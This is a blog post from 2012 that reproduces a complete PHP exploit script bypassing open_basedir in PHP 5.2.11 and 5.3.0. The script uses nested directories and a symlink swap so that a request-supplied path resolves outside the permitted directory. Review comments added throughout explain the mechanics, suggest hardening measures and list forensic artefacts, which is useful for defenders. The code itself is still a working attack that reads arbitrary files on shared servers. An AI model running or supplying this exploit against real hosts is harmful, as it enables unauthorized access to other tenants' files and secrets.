Thursday, May 10, 2012


<?php 
/* 
PHP 5.2.11/5.3.0 symlink() open_basedir bypass  
posted 3y HackTeach Loverz http://HackTeach.org/ 
i1t [ a.T] hotmail [ d0t] it 

CHUJWAMWMUZG 
*/ 

// Name of the placeholder directory and how many times it is nested below.
// A chain of identically named directories ("cx/cx/...") inside a
// web-writable folder is a filesystem artefact this script leaves behind.
$fakedir="cx"; 
$fakedep=16; 

$num=0; // numeric suffix of the output link name "symlink".$num 

// The target path comes straight from the request (GET is tried first, then
// POST) and is used below without validation or an allow-list.
if(!empty($_GET['file'])) $file=$_GET['file']; 
else if(!empty($_POST['file'])) $file=$_POST['file']; 
else $file=""; 

// Prints the banner and a self-posting form with a single text field, "file".
// $file is passed through htmlspecialchars() before it is echoed back into the
// value attribute, but $_SERVER["HTTP_HOST"] is concatenated into the action
// URL unescaped, so the request's Host header is reflected into the markup.
// NOTE(review): in this listing the "PHP_SELF" key is split across two lines
// by line wrapping; as printed, the array key contains a line break.
echo '<PRE><img 
src="http://www.hackteach.org/public/images/main.gif"><P>This is exploit 
from <a 
href="http://HackTeach.org" title="Hack Teach Loverz">Storm , DareDevil 
Lab - HackTeach</a> labs. 
posted by : storm 
<p>Script for legal use only. 
<p>PHP 5.2.11 5.3.0 symlink open_basedir bypass 
<p>More: <a href="http://HackTeach.org/">HackTeachLoverz</a> 
<p><form name="form" 
 action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF 
"]).'" method="post"><input type="text" name="file" size="50" 
value="'.htmlspecialchars($file).'"><input type="submit" name="hym" 
value="Create Symlink"></form>'; 

// No path submitted: stop after rendering the form.
if(empty($file)) 
    exit; 

// Everything below creates directories and links relative to the current
// working directory, so the script stops here when that directory is not
// writable by the PHP process. Keeping web-served directories non-writable
// for that account halts the script at this check.
if(!is_writable(".")) 
    die("not writable directory"); 

$level=0; // assigned here and not read again anywhere in this listing 

// Create $fakedir (if missing) and descend into it, $fakedep times, leaving a
// chain cx/cx/.../cx below the starting directory. The return values of
// mkdir() and chdir() are not checked.
for($as=0;$as<$fakedep;$as++){ 
    if(!file_exists($fakedir)) 
        mkdir($fakedir); 
    chdir($fakedir); 
} 

// $as equals $fakedep after the loop. This climbs $fakedep-1 levels, so the
// working directory ends up one level below the start (inside the first
// $fakedir) and $as is left at 0 for the counting done next.
while(1<$as--) chdir(".."); 

// Split the requested path on "/" into its components.
$hardstyle = explode("/", $file); 

// Recreate every non-empty component as a directory below the current
// position, descending as it goes; the last component is created as a
// directory too. $as counts the levels entered. mkdir()/chdir() results are
// not checked.
for($a=0;$a<count($hardstyle);$a++){ 
    if(!empty($hardstyle[$a])){ 
        if(!file_exists($hardstyle[$a]))  
            mkdir($hardstyle[$a]); 
        chdir($hardstyle[$a]); 
        $as++; 
    } 
} 
// One extra level on top of the counted components accounts for the single
// $fakedir level the script was still inside, so this climbs back to the
// directory it started in.
$as++; 
while($as--) 
    chdir(".."); 

// Remove any "fakesymlink" left by an earlier run, whether it is a directory
// or a link; @ suppresses the error from whichever call does not apply.
@rmdir("fakesymlink"); 
@unlink("fakesymlink"); 

// "fakesymlink" is created as a link to the bottom of the nested $fakedir
// chain ($fakedir repeated $fakedep times).
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); 

// Create "symlink".$num with a target that goes through "fakesymlink", climbs
// $fakedep-1 levels and then appends the requested path. While "fakesymlink"
// still points into the chain, that target resolves to the mirror tree built
// earlier, i.e. to a location inside the working directory.
// The loop advances $num past link names that already exist.
// NOTE(review): there is no upper bound and no other exit; if symlink() keeps
// failing for a different reason the loop never breaks on its own.
while(1) 
    if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, 
"symlink".$num))) break; 
    else $num++; 

// Swap step: the "fakesymlink" link is deleted and a real directory with the
// same name is created. The target text stored in "symlink".$num does not
// change, but "fakesymlink/../.." now climbs from the working directory
// instead of from the bottom of the chain, so the link no longer resolves to
// the location it resolved to when it was created. The header describes this
// as an open_basedir bypass in PHP 5.2.11 / 5.3.0.
//
// Hardening notes: add symlink to disable_functions where the application
// does not need it, do not rely on open_basedir as the only boundary between
// tenants, keep web-served directories non-writable for the PHP account, and
// configure the web server not to follow symbolic links (or only
// owner-matching ones) in served directories, since the result is fetched
// through the "./symlink".$num URL printed below.
// Artefacts for triage: nested "cx" directories, a "fakesymlink" directory,
// and "symlink0", "symlink1", ... links next to the script.
@unlink("fakesymlink"); 
mkdir("fakesymlink"); 

die('<FONT COLOR="RED">check symlink <a 
href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); 
?>
